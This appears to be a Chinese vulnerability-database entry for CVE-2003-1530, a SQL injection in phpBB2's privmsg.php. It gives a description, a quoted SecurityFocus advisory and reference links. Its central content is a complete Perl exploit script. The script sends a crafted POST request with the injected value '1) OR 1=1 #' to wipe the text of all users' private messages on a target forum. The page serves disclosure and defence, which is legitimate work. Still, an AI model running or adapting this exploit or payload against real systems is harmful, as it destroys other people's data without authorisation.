phpBB2 privmsg.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107164 漏洞类型 SQL注入
发布时间 2003-01-17 更新时间 2003-12-31
CVE编号 CVE-2003-1530 CNNVD-ID CNNVD-200312-448
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22182
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-448
|漏洞详情
phpBB2是一款免费开放源代码的WEB论坛/社区程序,由PHP语言实现,可以运行在Unix/Linux、MacOS、MicrosoftWindows系统下。phpBB2中的privmsg.php脚本对用户提交的输入缺少充分过滤,远程攻击者可以利用这个漏洞更改数据库逻辑,删除所有私人消息。phpBB2用户可以发送私人消息给任意用户,不过privmsg.php脚本中删除私人消息的函数存在SQL注入漏洞。如果我们提交要删除私人消息号码为"1)OR1=1#"的请求,系统上所有用户的私人消息将被删除。私人消息存储在两个表中,SQL注入只能工作在其中之一个表中,因此所有文本字段信息全部删除,但是主题和metadata数据只有当前登录用户才能被删除。
|漏洞EXP
source: http://www.securityfocus.com/bid/6634/info

A SQL injection vulnerability has been reported for phpBB2 systems that may result in the deletion of all private messages.

phpBB2, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries to execute on the underlying database. As a result, it is possible to manipulate SQL queries. This may allow a remote attacker to modify query logic or potentially corrupt the database. 

A remote attacker can exploit this vulnerability by manipulating URI parameters to cause the text of all private messages to be deleted.

#!/usr/bin/perl --

# phpBB delete the text of all users' private messages exploit
# Ulf Harnhammar
# January 2003

use Socket;

if (@ARGV != 2) { die "usage: $0 host sid\n"; }

($host, $sid) = @ARGV;
$host =~ s|\s+||g;
$sid =~ s|\s+||g;

$crlf = "\015\012";
$http = "POST /privmsg.php?folder=inbox&sid=$sid HTTP/1.0$crlf".
        "Host: $host$crlf".
        "User-Agent: Mozzarella/1.37++$crlf".
        "Referer: http://www.phpbb.com/$crlf".
        "Connection: close$crlf".
        "Content-Type: application/x-www-form-urlencoded$crlf".
        "Content-Length: 58$crlf$crlf".
        "mode=&delete=true&mark%5B%5D=1%29+OR+1%3D1+%23&confirm=Yes";

$tcp = getprotobyname('tcp') or die "Couldn't getprotobyname!\n";
$hosti = inet_aton($host) or die "Couldn't look up host!\n";
$hosts = sockaddr_in(80, $hosti);

socket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";
connect(SOK, $hosts) or die "Couldn't connect to port!\n";

select SOK; $| = 1; select STDOUT;

print SOK $http;

$junk = '';
while (<SOK>) { $junk .= $_; }

close SOK or die "Couldn't close!\n";
|参考资料

来源:BID
名称:6634
链接:http://www.securityfocus.com/bid/6634
来源:BUGTRAQ
名称:20030117phpBBSQLInjectionvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/307212/30/26300/threaded
来源:OSVDB
名称:4277
链接:http://www.osvdb.org/4277
来源:SECUNIA
名称:7887
链接:http://secunia.com/advisories/7887/
来源:BUGTRAQ
名称:20030116phpBBSQLInjectionvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2003-01/0125.html
来源:NSFOCUS
名称:4241
链接:http://www.nsfocus.net/vulndb/4241